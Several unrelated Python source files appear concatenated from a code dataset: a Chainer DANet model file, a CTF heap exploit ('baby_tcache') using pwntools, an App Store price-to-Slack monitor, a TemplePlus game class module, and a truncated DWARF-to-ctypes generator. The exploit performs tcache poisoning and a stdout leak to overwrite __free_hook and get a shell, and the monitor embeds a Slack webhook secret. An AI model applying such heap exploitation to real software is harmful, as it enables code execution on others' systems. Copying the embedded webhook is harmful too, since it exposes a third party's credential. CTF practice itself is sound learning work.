return get_danet(backbone=backbone, classes=classes, aux=aux, model_name="danet_resnetd50b_cityscapes",
**kwargs)
def danet_resnetd101b_cityscapes(pretrained_backbone=False, classes=19, aux=True, **kwargs):
"""
DANet model on the base of ResNet(D)-101b for Cityscapes from 'Dual Attention Network for Scene Segmentation,'
https://arxiv.org/abs/1809.02983.
Parameters:
----------
pretrained_backbone : bool, default False
Whether to load the pretrained weights for feature extractor.
classes : int, default 19
Number of segmentation classes.
aux : bool, default True
Whether to output an auxiliary result.
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.chainer/models'
Location for keeping the model parameters.
"""
backbone = resnetd101b(pretrained=pretrained_backbone, ordinary_init=False, bends=(3,)).features
del backbone.final_pool
return get_danet(backbone=backbone, classes=classes, aux=aux, model_name="danet_resnetd101b_cityscapes",
**kwargs)
def _test():
import numpy as np
import chainer
chainer.global_config.train = False
in_size = (480, 480)
aux = False
pretrained = False
models = [
danet_resnetd50b_cityscapes,
danet_resnetd101b_cityscapes,
]
for model in models:
net = model(pretrained=pretrained, in_size=in_size, aux=aux)
weight_count = net.count_params()
print("m={}, {}".format(model.__name__, weight_count))
assert (model != danet_resnetd50b_cityscapes or weight_count == 47586427)
assert (model != danet_resnetd101b_cityscapes or weight_count == 66578555)
batch = 2
classes = 19
x = np.zeros((batch, 3, in_size[0], in_size[1]), np.float32)
ys = net(x)
y = ys[0] if aux else ys
assert ((y.shape[0] == x.shape[0]) and (y.shape[1] == classes) and (y.shape[2] == x.shape[2]) and
(y.shape[3] == x.shape[3]))
if __name__ == "__main__":
_test()
| StarcoderdataPython |
3384583 | # File: assets/img/baby_tcache/exploit.py
from pwn import *
import sys
HOST='192.168.127.12'
PORT=56746
context.terminal=['tmux', 'splitw', '-h']
if len(sys.argv)>1:
r=remote(HOST,PORT)
else:
r=process('./baby_tcache',env={"LD_PRELOAD":"./libc.so.6"})
libc=ELF("./libc.so.6")
def menu(opt):
r.sendlineafter("Your choice: ",str(opt))
def alloc(size,data='a'):
menu(1)
r.sendlineafter("Size:",str(size))
r.sendafter("Data:",data)
def delete(idx):
menu(2)
r.sendlineafter("Index:",str(idx))
def getleak():
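    # Rough plan of the exploit as implemented below: groom the heap so the
    # program's off-by-one NULL write corrupts chunk metadata, trigger backward
    # coalescing to obtain overlapping chunks, partially overwrite a freed
    # chunk's fd to reach _IO_2_1_stdout_, set _flags to 0xfbad1800 to leak a
    # libc pointer via stdout, then tcache-poison __free_hook with a one-gadget
    # and free a chunk to get code execution.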
alloc(0x500-0x8) # 0
alloc(0x30) # 1
alloc(0x40) # 2
alloc(0x50) # 3
alloc(0x60) # 4
alloc(0x500-0x8) # 5
alloc(0x70) # 6
delete(4)
alloc(0x68,'A'*0x60+'\x60\x06') # set the prev size
delete(2)
delete(0)
delete(5) # backward coeleacsing
alloc(0x500-0x9+0x34)
delete(4)
alloc(0xa8,'\x60\x07') # corrupt the fd
alloc(0x40,'a')
gdb.attach(r,'''b*0x0000555555554D21\nb*_IO_file_seek''')
alloc(0x3e,p64(0xfbad1800)+p64(0)*3+'\x00') # overwrite the file-structure
r.recv(8)
libc.address=u64(r.recv(8))-0x3ed8b0
log.info("libc @ "+hex(libc.address))
alloc(0xa8,p64(libc.symbols['__free_hook']))
alloc(0x60,"A")
alloc(0x60,p64(libc.address+0x4f322)) # one gadget with $rsp+0x40 = NULL
delete(0)
r.interactive()
if __name__=='__main__':
getleak()
| StarcoderdataPython |
61449 | #!/usr/bin/env python3
VERSION = "0.0.1-sig"
import requests, json, time, traceback
from random import random
from bs4 import BeautifulSoup
WEBHOOK_URL = "https://hooks.slack.com/services/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"
TEST_URL = "https://apps.apple.com/cn/app/goodnotes-4/id778658393"
SLEEP_IN = 3
URL_LIST = [
"https://apps.apple.com/cn/app/goodnotes-5/id1444383602",
]
def get_price(url:str):
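    """Scrape an App Store product page and return a (title, price, url) tuple."""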
headers = {
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language":"zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7",
"Cache-Control": "max-age=0",
"Connection": "keep-alive",
"DNT": "1",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
}
r = requests.get(url, headers = headers)
soup = BeautifulSoup(r.text,'lxml')
info = soup.find("header", class_="product-header")
title = info.find("h1", class_="product-header__title").text.strip().split("\n")[0]
price = info.find("li",class_="app-header__list__item--price").text
return title, price, url
def post_message(text) -> None:
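    """Post a plain-text message to the configured Slack incoming webhook."""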
payload = {
"text": text
}
r = requests.post(WEBHOOK_URL, data = json.dumps(payload))
if r.text != 'ok': raise RuntimeError("信息发送失败")
def get_prices(urls:list, sleep_func) -> list:
result = []
for url in urls:
data = get_price(url)
result.append(data)
sleep = sleep_func()
time.sleep(sleep)
return result
def handle_check(urls:list, check_sleep:int, item_sleep):
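    """Poll the URLs forever and push a Slack notification whenever a title's price changes or appears; check_sleep is the delay between polling rounds, item_sleep yields the delay between individual requests."""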
print("启动价格查询序列...")
mem_list = []
while True:
try:
new_prices = []
new_datas = get_prices(urls, item_sleep)
            ## Iterate over every newly fetched record
for new_data in new_datas:
                ## If the record changed or is not stored yet
if not new_data in mem_list:
title = new_data[0]
old_item = None
                    # Find the old record for this title
for mem_item in mem_list:
if title == mem_item[0]:
old_item = mem_item
break
                    ## Drop the old record
if old_item != None:
mem_list.remove(old_item)
                    ## Update memory and queue the notification
mem_list.append(new_data)
new_prices.append(new_data)
if len(new_prices) != 0:
print("发现存在数据更新,启动消息发送序列...")
for item in new_prices:
message = "[APP] %s 价格发生变动,当前价格: %s <%s|查看>"%item
print("发现更新:%s"%message)
post_message(message)
except Exception as e:
print("发生错误:")
print(traceback.format_exc())
finally:
time.sleep(check_sleep)
print("价格查询序列结束...")
def simple_time():
return int(random() * SLEEP_IN)
if __name__ == "__main__":
import argparse
p = argparse.ArgumentParser(prog='AppStore 价格监测程序',
description="监测 App Store 价格变化,当其发生改变,则推送通知到 Slack")
p.add_argument("-s","--slack", dest="slack", help="Slack WebHook URL", type=str)
p.add_argument("-t1","--time1", dest="time1", help="轮询时长,单位为 s", default=1000, type=int)
p.add_argument("-t2","--time2", dest="time2", help="单个查询间隔时长,单位为 s", type=int)
args = p.parse_args()
if args.slack != None:
WEBHOOK_URL = args.slack
if args.time2 != None:
SLEEP_IN = args.time2
print("Checking with args", args)
handle_check(URL_LIST, args.time1, simple_time) | StarcoderdataPython |
106591 | from templeplus.pymod import PythonModifier
from toee import *
import tpdp
import char_class_utils
import tpactions
###################################################
def GetConditionName():
return "Swashbuckler"
print "Registering " + GetConditionName()
classEnum = stat_level_swashbuckler
classSpecModule = __import__('class049_swashbuckler')
###################################################
#### standard callbacks - BAB and Save values
def OnGetToHitBonusBase(attachee, args, evt_obj):
classLvl = attachee.stat_level_get(classEnum)
babvalue = game.get_bab_for_class(classEnum, classLvl)
evt_obj.bonus_list.add(babvalue, 0, 137) # untyped, description: "Class"
return 0
def OnGetSaveThrowFort(attachee, args, evt_obj):
value = char_class_utils.SavingThrowLevel(classEnum, attachee, D20_Save_Fortitude)
evt_obj.bonus_list.add(value, 0, 137)
return 0
def OnGetSaveThrowReflex(attachee, args, evt_obj):
value = char_class_utils.SavingThrowLevel(classEnum, attachee, D20_Save_Reflex)
evt_obj.bonus_list.add(value, 0, 137)
return 0
def OnGetSaveThrowWill(attachee, args, evt_obj):
value = char_class_utils.SavingThrowLevel(classEnum, attachee, D20_Save_Will)
evt_obj.bonus_list.add(value, 0, 137)
return 0
classSpecObj = PythonModifier(GetConditionName(), 0)
classSpecObj.AddHook(ET_OnToHitBonusBase, EK_NONE, OnGetToHitBonusBase, ())
classSpecObj.AddHook(ET_OnSaveThrowLevel, EK_SAVE_FORTITUDE, OnGetSaveThrowFort, ())
classSpecObj.AddHook(ET_OnSaveThrowLevel, EK_SAVE_REFLEX, OnGetSaveThrowReflex, ())
classSpecObj.AddHook(ET_OnSaveThrowLevel, EK_SAVE_WILL, OnGetSaveThrowWill, ())
#Checks for a load greater than light or armor greater than light (to enable various abilities)
def SwashbucklerEncumberedCheck(obj):
#Light armor or no armor
armor = obj.item_worn_at(5)
if armor != OBJ_HANDLE_NULL:
armorFlags = armor.obj_get_int(obj_f_armor_flags)
if (armorFlags != ARMOR_TYPE_LIGHT) and (armorFlags != ARMOR_TYPE_NONE):
return 1
#No heavy or medium load
HeavyLoad = obj.d20_query(Q_Critter_Is_Encumbered_Heavy)
if HeavyLoad:
return 1
MediumLoad = obj.d20_query(Q_Critter_Is_Encumbered_Medium)
if MediumLoad:
return 1
return 0
#Check if the weapons is usable with finesse
def IsFinesseWeapon(creature, weapon):
#Unarmed works
if (weapon == OBJ_HANDLE_NULL):
return 1
#Ranged weapons don't work
weapFlags = weapon.obj_get_int(obj_f_weapon_flags)
if (weapFlags & OWF_RANGED_WEAPON):
return 0
#Light weapon works
wieldType = creature.get_wield_type(weapon)
if (wieldType == 0):
return 1
#Whip, rapier, spiked chain works
WeaponType = weapon.get_weapon_type()
if (WeaponType == wt_whip) or (WeaponType == wt_spike_chain) or (WeaponType == wt_rapier):
return 1
return 0
#Swashbuckler Abilities
# Swashbuckler Grace
def SwashbucklerGraceReflexBonus(attachee, args, evt_obj):
#Must not be encumbered
if SwashbucklerEncumberedCheck(attachee):
return 0
classLvl = attachee.stat_level_get(classEnum)
classBonusLvls = attachee.d20_query("Swashbuckler Grace Level Bonus")
classLvl = classLvl + classBonusLvls
if classLvl < 11:
bonval = 1
elif classLvl < 20:
bonval = 2
else:
bonval = 3
evt_obj.bonus_list.add(bonval, 0, "Swashbuckler Grace" ) #Competence Bonus
return 0
swashbucklerGrace = PythonModifier("Swashbuckler Grace", 2) #Spare, Spare
swashbucklerGrace.MapToFeat("Swashbuckler Grace")
swashbucklerGrace.AddHook(ET_OnSaveThrowLevel , EK_SAVE_REFLEX , SwashbucklerGraceReflexBonus, ())
# Swashbuckler Insightful Strike
def SwashbucklerInsightfulStrikeDamageBonus(attachee, args, evt_obj):
#Must not be encumbered
if SwashbucklerEncumberedCheck(attachee):
return 0
#Must be usable with weapon finesse
weaponUsed = evt_obj.attack_packet.get_weapon_used()
if not IsFinesseWeapon(attachee, weaponUsed):
return 0
#Enemy must be sneak attackable
target = evt_obj.attack_packet.target
if target.d20_query(Q_Critter_Is_Immune_Critical_Hits):
return 0
    intScore = attachee.stat_level_get(stat_intelligence)
    intMod = (intScore - 10)/2
evt_obj.damage_packet.bonus_list.add_from_feat(intMod, 0, 137, "Insightful Strike")
return 0
swashbucklerInsightfulStrike = PythonModifier("Swashbuckler Insightful Strike", 2) #Spare, Spare
swashbucklerInsightfulStrike.MapToFeat("Swashbuckler Insightful Strike")
swashbucklerInsightfulStrike.AddHook(ET_OnDealingDamage, EK_NONE, SwashbucklerInsightfulStrikeDamageBonus, ())
# Swashbuckler Dodge
def SwashbucklerDodgeACBonus(attachee, args, evt_obj):
#Must not be encumbered
if SwashbucklerEncumberedCheck(attachee):
return 0
attacker = evt_obj.attack_packet.attacker
if attacker == OBJ_HANDLE_NULL or attacker == attachee:
return 0
#Test if the ability is used
prevAttacker = args.get_obj_from_args(0)
#Works for each attack from the first attacker like dodge (SRD let you choose the opponent)
if prevAttacker != OBJ_HANDLE_NULL:
if attacker != prevAttacker:
return 0
classLvl = attachee.stat_level_get(classEnum)
classBonusLvls = attachee.d20_query("Swashbuckler Dodge Level Bonus")
classLvl = classLvl + classBonusLvls
bonval = classLvl / 5
evt_obj.bonus_list.add(bonval, 8, 137 ) #Dodge bonus
args.set_args_from_obj(0, attacker)
return 0
def SwashbucklerDodgeBeginRound(attachee, args, evt_obj):
#Reset to a null attacker at the beginning of the round
args.set_args_from_obj(0, OBJ_HANDLE_NULL)
return 0
swashbucklerDodge = PythonModifier("Swashbuckler Dodge", 4) #Used this round flag, Attacker Upper Handle, Attacker Lower Handle, Spare
swashbucklerDodge.MapToFeat("Swashbuckler Dodge")
swashbucklerDodge.AddHook(ET_OnGetAC, EK_NONE, SwashbucklerDodgeACBonus, ())
swashbucklerDodge.AddHook(ET_OnBeginRound, EK_NONE, SwashbucklerDodgeBeginRound, ())
swashbucklerDodge.AddHook(ET_OnConditionAdd, EK_NONE, SwashbucklerDodgeBeginRound, ())
# Swashbuckler Acrobatic Charge
swashbucklerAcrobaticCharge = PythonModifier("Swashbuckler Acrobatic Charge", 2) #Used this round flag, Spare
swashbucklerAcrobaticCharge.MapToFeat("Swashbuckler Acrobatic Charge")
#Swashbuckler Improved Flanking
def SwashbucklerImprovedFlankingAttack(attachee, args, evt_obj):
if evt_obj.attack_packet.get_flags() & D20CAF_FLANKED:
evt_obj.bonus_list.add(2, 0, "Swashbuckler Improved Flanking")
return 0
swashbucklerImprovedFlanking = PythonModifier("Swashbuckler Improved Flanking", 2) #Spare, Spare
swashbucklerImprovedFlanking.MapToFeat("Swashbuckler Improved Flanking")
swashbucklerImprovedFlanking.AddHook(ET_OnToHitBonus2, EK_NONE, SwashbucklerImprovedFlankingAttack, ())
# Swashbuckler Lucky
def SwashbucklerLuckyRerollSavingThrow(attachee, args, evt_obj):
if args.get_arg(0) and args.get_arg(1):
if not evt_obj.return_val:
evt_obj.return_val = 1
args.set_arg(0,0)
return 0
def SwashbucklerLuckyRerollAttack(attachee, args, evt_obj):
if args.get_arg(0) and args.get_arg(2):
if not evt_obj.return_val:
evt_obj.return_val = 1
args.set_arg(0,0)
return 0
def SwashbucklerLuckyRadial(attachee, args, evt_obj):
#Add a checkbox to use the reroll if a charge is available
if args.get_arg(0):
radial_parent = tpdp.RadialMenuEntryParent("Lucky")
LuckyID = radial_parent.add_child_to_standard(attachee, tpdp.RadialMenuStandardNode.Class)
checkboxSavingThrow = tpdp.RadialMenuEntryToggle("Reroll Next Missed Saving Throw", "TAG_INTERFACE_HELP")
checkboxSavingThrow.link_to_args(args, 1)
checkboxSavingThrow.add_as_child(attachee, LuckyID)
checkboxAttack = tpdp.RadialMenuEntryToggle("Reroll Next Missed Attack", "TAG_INTERFACE_HELP")
checkboxAttack.link_to_args(args, 2)
checkboxAttack.add_as_child(attachee, LuckyID)
return 0
def SwashbucklerLuckyNewDay(attachee, args, evt_obj):
args.set_arg(0, 1)
return 0
swashbucklerLucky = PythonModifier("Swashbuckler Lucky", 5) #Used, Reroll Saving Throw, Reroll Attack, Spare, Spare
swashbucklerLucky.MapToFeat("Swashbuckler Lucky")
swashbucklerLucky.AddHook(ET_OnBuildRadialMenuEntry, EK_NONE, SwashbucklerLuckyRadial, ())
swashbucklerLucky.AddHook(ET_OnD20Query, EK_Q_RerollSavingThrow, SwashbucklerLuckyRerollSavingThrow, ())
swashbucklerLucky.AddHook(ET_OnD20Query, EK_Q_RerollAttack, SwashbucklerLuckyRerollAttack, ())
swashbucklerLucky.AddHook(ET_OnConditionAdd, EK_NONE, SwashbucklerLuckyNewDay, ())
swashbucklerLucky.AddHook(ET_OnNewDay, EK_NEWDAY_REST, SwashbucklerLuckyNewDay, ())
# Swashbuckler Acrobatic Skill Mastery
swashbucklerAcrobaticSkillMastery = PythonModifier("Swashbuckler Acrobatic Skill Mastery", 2) #Spare, Spare
swashbucklerAcrobaticSkillMastery.MapToFeat("Swashbuckler Acrobatic Skill Mastery")
# Swashbuckler Weakening Critical
def SwashbucklerWeakeningCriticalOnDamage(attachee, args, evt_obj):
#Enemy must not be immune to criticals
target = evt_obj.attack_packet.target
if target.d20_query(Q_Critter_Is_Immune_Critical_Hits):
return 0
attackFlags = evt_obj.attack_packet.get_flags()
#Must be a critical
criticalHit = attackFlags & D20CAF_CRITICAL
if not criticalHit:
return 0
target.condition_add_with_args( "Damage_Ability_Loss", 0, 2)
game.create_history_freeform(target.description + " takes 2 points of strength damage from weakening critical.\n\n")
target.float_text_line("Strength damage!")
return 0
swashbucklerWeakeningCritical = PythonModifier("Swashbuckler Weakening Critical", 2) #Spare, Spare
swashbucklerWeakeningCritical.MapToFeat("Swashbuckler Weakening Critical")
swashbucklerWeakeningCritical.AddHook(ET_OnDealingDamage2, EK_NONE, SwashbucklerWeakeningCriticalOnDamage, ())
# Swashbuckler Wounding Critical
def SwashbucklerWoundingCriticalOnDamage(attachee, args, evt_obj):
#Enemy must not be immune to criticals
target = evt_obj.attack_packet.target
if target.d20_query(Q_Critter_Is_Immune_Critical_Hits):
return 0
attackFlags = evt_obj.attack_packet.get_flags()
#Must be a critical
criticalHit = attackFlags & D20CAF_CRITICAL
if not criticalHit:
return 0
target.condition_add_with_args( "Damage_Ability_Loss", 2, 2)
game.create_history_freeform(target.description + " takes 2 points of constitution damage from wounding critical.\n\n")
target.float_text_line("Constitution damage!")
return 0
swashbucklerWoundingCritical = PythonModifier("Swashbuckler Wounding Critical", 2) #Spare, Spare
swashbucklerWoundingCritical.MapToFeat("Swashbuckler Wounding Critical")
swashbucklerWoundingCritical.AddHook(ET_OnDealingDamage2, EK_NONE, SwashbucklerWoundingCriticalOnDamage, ())

from abc import abstractproperty
from collections import namedtuple
from math import ceil
from typing import Optional
from elftools.dwarf.die import DIE
from common.exceptions import WrongDIEType
from elf.constants import BITS_IN_BYTE, DIE_TYPE_COLLECTION_TAGS, DIE_TYPE_MODIFIER_TAGS, ENCODING, REFERENCE_FORM_WITH_OFFSET
from program.exceptions import ModifierTypeWithNoReferenceError, NonResolvedReferenceError, UnexpectedChildError
from program.program_abc import ProgramABC
from program.generator.constants import size_map, types_map
class ProgramType(ProgramABC):
"""Class represent types of the program
- dependencies - property retruns list of type dependencies, or None if
references were not resolved
- create() - classmethod creates type object for given DIE
- get_class() - method returns specific class of given type
- alias - members value is alias of given type in generated code -
alias is available only after reference resolution
"""
alias: str
@classmethod
def create(cls, die: DIE) -> Optional['ProgramType']:
"""Create instance of subclass of ProgramType appropriate to given die"""
match(die.tag):
case x if x in DIE_TYPE_MODIFIER_TAGS:
return ProgramTypeModifier.create(die)
case x if x in DIE_TYPE_COLLECTION_TAGS:
return ProgramTypeCollection.create(die)
case 'DW_TAG_enumeration_type':
return ProgramTypeEnum(die)
case 'DW_TAG_base_type':
return ProgramTypeBase(die)
case 'DW_TAG_typedef':
return ProgramTypeTypedef(die)
case 'DW_TAG_array_type':
return ProgramTypeArray(die)
case 'DW_TAG_subroutine_type':
return ProgramTypeFunction(die)
case _:
raise WrongDIEType(f'Creating ProgramType subclass instance with die of tag {die.tag}')
@abstractproperty
def dependencies(self) -> Optional[list['ProgramType']]: ...
class ProgramTypeCollection(ProgramType):
"""Class represents all collection datatypes"""
Member = namedtuple('Member', ['name', 'reference', 'offset', 'bitfield'])
BitField = namedtuple('Bitfield', ['bitsize', 'bitoffset'])
def __init__(self, die: DIE) -> None:
super().__init__(die)
self.alias: str = str(self.get_die_attribute('DW_AT_name'), ENCODING)
self.size = self.get_die_attribute('DW_AT_byte_size')
self.members_refs = self._parse_members()
self._dependencies = None
@classmethod
    def create(cls, die: DIE) -> 'ProgramTypeCollection':
"""Creates collection type for given DIE"""
match(die.tag):
case 'DW_TAG_structure_type':
return ProgramTypeStructure(die)
case 'DW_TAG_union_type':
return ProgramTypeUnion(die)
case _:
raise WrongDIEType(f'Creating ProgramTypeCollection subclass instance with die of tag {die.tag}')
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Resolve references for collection members"""
self._dependencies = [object_refs[ref.reference] for ref in self.members_refs]
@property
def dependencies(self) -> list['ProgramType']:
"""Returns dependencies dictated by members or None if
dependencies not resolved.
"""
return self._dependencies
def _parse_members(self) -> list[Member]:
"""Get all structure members, their type references and offsets"""
members = []
for child in self.die.iter_children():
if child.tag != 'DW_TAG_member':
raise UnexpectedChildError(f'Collection {self.alias} has child of type {child.tag}')
name = str(child.attributes['DW_AT_name'].value, ENCODING)
reference = child.attributes['DW_AT_type'].value
if child.attributes['DW_AT_type'].form in REFERENCE_FORM_WITH_OFFSET:
reference += self.die.cu.cu_offset
offset = 0
if 'DW_AT_data_member_location' in child.attributes:
offset = child.attributes['DW_AT_data_member_location'].value
bitfield = None
if 'DW_AT_bit_size' in child.attributes:
bitsize = child.attributes['DW_AT_bit_size'].value
bitoffset = child.attributes['DW_AT_bit_offset'].value
bitfield = self.BitField(bitsize, bitoffset)
members.append(self.Member(name, reference, offset, bitfield))
return members
def _get_members_str(self) -> str:
"""Retruns string descripting collections's members"""
description = ''
for member in self.members_refs:
description += f'\n\t{member}'
return description
def _generate_members(self) -> str:
"""Generate fields of collections members"""
code = f'\t_fields_ = [\n'
for member, dep in zip(self.members_refs, self._dependencies):
code += f'\t\t("{member.name}", {dep.alias}),\n'
code += f'\t]\n'
return code
class ProgramTypeModifier(ProgramType):
"""Class represents modifier of program type"""
def __init__(self, die: DIE):
super().__init__(die)
self.alias = None
self.reference: int = self.get_die_attribute('DW_AT_type')
self.size: int = self.get_die_attribute('DW_AT_byte_size')
self._dependency = None
if self.size is None and self.reference is None:
raise ModifierTypeWithNoReferenceError(f'DIE offset {self.offset} of {die.tag} has no reference')
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Resolve reference of type modifier"""
if self.reference is not None:
self._dependency = object_refs[self.reference]
self.alias = self._dependency.alias
self.size = self._dependency.size
@property
def dependencies(self) -> list['ProgramType']:
"""Dependency of type modifier or None if not resolved.
In case of void pointer no reference is omitted.
"""
if self.reference is not None:
return [self._dependency] if self._dependency is not None else None
return []
@classmethod
def create(cls, die: DIE) -> Optional['ProgramTypeModifier']:
"""Create type modifier for given DIE"""
try:
match(die.tag):
case 'DW_TAG_pointer_type':
return ProgramTypePointer(die)
case 'DW_TAG_const_type':
return ProgramTypeConst(die)
case 'DW_TAG_volatile_type':
return ProgramTypeVolatile(die)
case _:
raise WrongDIEType(f'Creating ProgramTypeModifier subclass instance with die of tag {die.tag}')
except ModifierTypeWithNoReferenceError:
return None
class ProgramTypePointer(ProgramTypeModifier):
"""Instances of this class are pointer modifiers"""
def __init__(self, die: DIE) -> None:
super().__init__(die)
self.alias = None
def __str__(self) -> str:
description = super().__str__()
return description + f'ProgramTypePointer to offset {self.reference if self.reference else "Void"}'
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Resolve reference of type modifier"""
if self.reference is not None:
try:
self._dependency = object_refs[self.reference]
self.refsize = self._dependency.size if self._dependency.size else self.size
except KeyError: # Pointer to constat value
self.refsize = self.size
self.reference = None
else:
self.refsize = self.size
self.alias = f'PointerClass({self.refsize})'
def generate_code(self) -> str:
"""Generate code for pointer type"""
return ''
@property
def dependencies(self) -> list['ProgramType']:
"""Pointers have no dependencies"""
return []
class ProgramTypeConst(ProgramTypeModifier):
"""Instances of this class are const modifiers"""
def __init__(self, die: DIE) -> None:
super().__init__(die)
def __str__(self) -> str:
description = super().__str__()
return description + f'ProgramTypeConst to {self.reference}'
def generate_code(self) -> str:
"""Const modifier is omitted."""
return ''
class ProgramTypeVolatile(ProgramTypeModifier):
"""Instances of this class are volatile modifiers"""
def __init__(self, die: DIE) -> None:
super().__init__(die)
def __str__(self) -> str:
description = super().__str__()
return description + f'ProgramTypeVolatile to {self.reference}'
def generate_code(self) -> str:
"""Volatile modifier is omitted."""
return ''
class ProgramTypeBase(ProgramType):
"""Instances of this class are base program types"""
def __init__(self, die: DIE) -> None:
super().__init__(die)
self._name = str(self.get_die_attribute('DW_AT_name'), ENCODING)
self.alias = types_map[self._name]
        byte_size = self.get_die_attribute('DW_AT_byte_size')
        if byte_size is not None:
            self.bitsize = byte_size * BITS_IN_BYTE
        else:
            self.bitsize = self.get_die_attribute('DW_AT_bit_size')
self.bitoffset = self.get_die_attribute('DW_AT_bit_offset')
@property
def size(self) -> int:
"""Size of a type in bytes"""
return ceil(self.bitsize / BITS_IN_BYTE)
@property
def dependencies(self) -> Optional[list['ProgramType']]:
"""Base types have no dependencies, returns empty list"""
return []
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Base types have no references"""
return
def __str__(self) -> str:
description = super().__str__()
return description + f'Base type {self.alias} of size {self.size}'
def generate_code(self) -> str:
"""Returns ctype type for given base type"""
return self.alias
class ProgramTypeEnum(ProgramType):
"""Instances of this class are enumeration types"""
Enumerator = namedtuple('Enumerator', ['name', 'value'])
def __init__(self, die: DIE) -> None:
super().__init__(die)
self.alias: str = str(self.get_die_attribute('DW_AT_name'), ENCODING)
self.size: int = self.get_die_attribute('DW_AT_byte_size')
self.enumerators = self._parse_enumerators()
def __str__(self) -> str:
description = super().__str__()
description += f'ProgramTypeEnum {self.alias}'
description += self._get_enumerators_str()
return description
@property
def dependencies(self) -> Optional[list['ProgramType']]:
"""Enumerators have no dependencies, returns empty list"""
return []
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Enumerators have no references"""
return
def generate_code(self) -> str:
"""Generate code of enumeration class"""
code = f'class {self.alias}({size_map[self.size]}, Enum):\n'
code += f'\t_type = {size_map[self.size]}\n'
for enumerator in self.enumerators:
code += f'\t{enumerator.name} = {enumerator.value}\n'
return code
def _parse_enumerators(self) -> list[Enumerator]:
"""Get all structure members, their type references and offsets"""
enumerators = []
for child in self.die.iter_children():
if child.tag != 'DW_TAG_enumerator':
raise UnexpectedChildError(f'Enumerators {self.alias} has child of type {child.tag}')
name = str(child.attributes['DW_AT_name'].value, ENCODING)
value = child.attributes['DW_AT_const_value'].value
enumerators.append(self.Enumerator(name, value))
return enumerators
def _get_enumerators_str(self) -> str:
"""Retruns string descripting it's members"""
description = ''
for member in self.enumerators:
description += f'\n\t{member}'
return description
class ProgramTypeUnion(ProgramTypeCollection):
"""Instances of this class are union types"""
def __str__(self) -> str:
description = super().__str__()
description += f'ProgramTypeUnion {self.alias}'
description += self._get_members_str()
return description
def generate_code(self) -> str:
"""Generate code of ctype Union class"""
code = f'class {self.alias}(Union):\n'
code += self._generate_members()
return code
class ProgramTypeTypedef(ProgramType):
"""Instances of this class are type definitions"""
def __init__(self, die: DIE) -> None:
super().__init__(die)
self.alias: str = str(self.get_die_attribute('DW_AT_name'), ENCODING)
self.reference: int = self.get_die_attribute('DW_AT_type')
self.size: int = self.get_die_attribute('DW_AT_size')
self._dependency: Optional[ProgramType] = None
def __str__(self) -> str:
description = super().__str__()
return description + f'ProgramTypeTypedef of {self.alias} to reference {self.reference or "Void"}'
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Resolve reference for given type alias"""
if self.reference is None:
self._dependency = []
else:
self._dependency = [object_refs[self.reference]]
@property
def dependencies(self) -> Optional[list['ProgramType']]:
"""Return dependencies or none if dependencies to resolved """
return self._dependency
def generate_code(self) -> str:
"""Generate type alias for given name"""
if self._dependency is None:
raise NonResolvedReferenceError(f'{self.alias} generates code with unresolved reference')
if self._dependency == []:
code = f'{self.alias} = Void\n'
else:
code = f'{self.alias} = {self._dependency[0].alias}\n'
return code
class ProgramTypeStructure(ProgramTypeCollection):
"""Instances of this class are structure types"""
def __str__(self) -> str:
description = super().__str__()
description += f'ProgramTypeStructure {self.alias}'
description += self._get_members_str()
return description
def generate_code(self) -> str:
"""Generates code of structure type"""
code = f'class {self.alias}(Structure):\n'
code += self._generate_members()
return code
class ProgramTypeArray(ProgramType):
"""Instances of this class are array types"""
def __init__(self, die: DIE) -> None:
super().__init__(die)
self.reference = self.get_die_attribute('DW_AT_type')
self.alias = None
self._dependency = None
for child in self.die.iter_children():
match(child.tag):
case 'DW_TAG_subrange_type' if 'DW_AT_upper_bound' in child.attributes:
self.count = child.attributes['DW_AT_upper_bound'].value + 1
break
case 'DW_TAG_subrange_type' if 'DW_AT_count' in child.attributes:
self.count = child.attributes['DW_AT_count'].value
break
def __str__(self) -> str:
description = super().__str__()
return description + f'ProgramTypeArray of reference {self.reference}, elems {self.count}'
@property
def dependencies(self) -> Optional[list['ProgramType']]:
"""Return array type dependency or None if dependency not resolved"""
return [self._dependency] if self._dependency is not None else None
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Resolve array type dependency"""
self._dependency = object_refs[self.reference]
self.alias = f'{self._dependency.alias}_array_{self.count}'
def generate_code(self) -> str:
"""Generate definition of given array type"""
return f'{self.alias} = {self._dependency.alias} * {self.count}'
class ProgramTypeFunction(ProgramType):
ArgumentType = namedtuple('ArgumentType', ['reference'])
def __init__(self, die: DIE):
super().__init__(die)
self.reference: int = self.get_die_attribute('DW_AT_type')
self.arg_types: list[self.ArgumentType] = self._parse_arguments()
self.size: int = self.get_die_attribute('DW_AT_byte_size')
self._dependency = None
self.alias = None
def __str__(self) -> str:
description = super().__str__()
description += f'ProgramTypeFunction of reference {self.reference}'
description += self._get_arguments_str()
return description
@property
def dependencies(self) -> Optional[list['ProgramType']]:
"""Dependencies of given function type, None if dependencies were not resolved"""
return self._dependency
def resolve_refs(self, object_refs: dict[int, ProgramABC]) -> None:
"""Resolve dependencies of given funciton type"""
self._dependency = []
if self.reference:
self._dependency += [object_refs[self.reference]]
self._dependency += [object_refs[arg.reference] for arg in self.arg_types]
self.alias = f'FunctionType_{self.offset}'
def generate_code(self) -> str:
"""Generate code of given function - create function type class"""
code = f'class {self.alias}(FunctionType):\n'
code += f'\t_return_type = {self._dependency[0].alias if self.reference else "Void"}\n'
code += f'\t_args = [{", ".join(arg.alias for arg in self._dependency[1:])}]\n'
return code
def _parse_arguments(self) -> list[ArgumentType]:
"""Get all function type argument types references"""
arg_types = []
for child in self.die.iter_children():
if child.tag != 'DW_TAG_formal_parameter':
raise UnexpectedChildError(f'Function type of offset {self.offset} has child of type {child.tag}')
reference = child.attributes['DW_AT_type'].value
